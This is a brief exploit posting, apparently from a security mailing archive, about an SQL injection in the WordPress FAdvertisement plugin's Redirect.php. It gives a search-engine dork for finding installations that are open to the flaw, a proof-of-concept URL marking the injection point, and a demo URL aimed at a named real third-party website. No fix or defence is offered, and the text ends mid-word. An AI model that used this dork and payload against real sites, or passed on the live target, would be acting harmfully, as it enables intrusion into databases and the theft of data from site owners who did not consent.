WordPress FAdvertisement SQL Injection
Posted on 15 August 2017
[+] Title: WordPress FAdvertisement Plugin Sql Injection Vulnerability [+] Date: 2017/08/13 [+] Author: APA Golestan - GuCert [+] Vendor Homepage: www.WordPress.org [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable File: /Redirect.php [+} Dork : inurl:/wp-content/plugins/FAdvertisement/Redirect.php?id= ### POC: [+} http://site/wp-content/plugins/FAdvertisement/Redirect.php?id=[SQL-Injection] ### Demo: [+] http://negaheghtesadi.ir/wp-content/plugins/FAdvertisement/Redirect.php?id=11 ' ### Credit: [+] Gucert.ir ================================ thank you for all packetstormsecurity admins d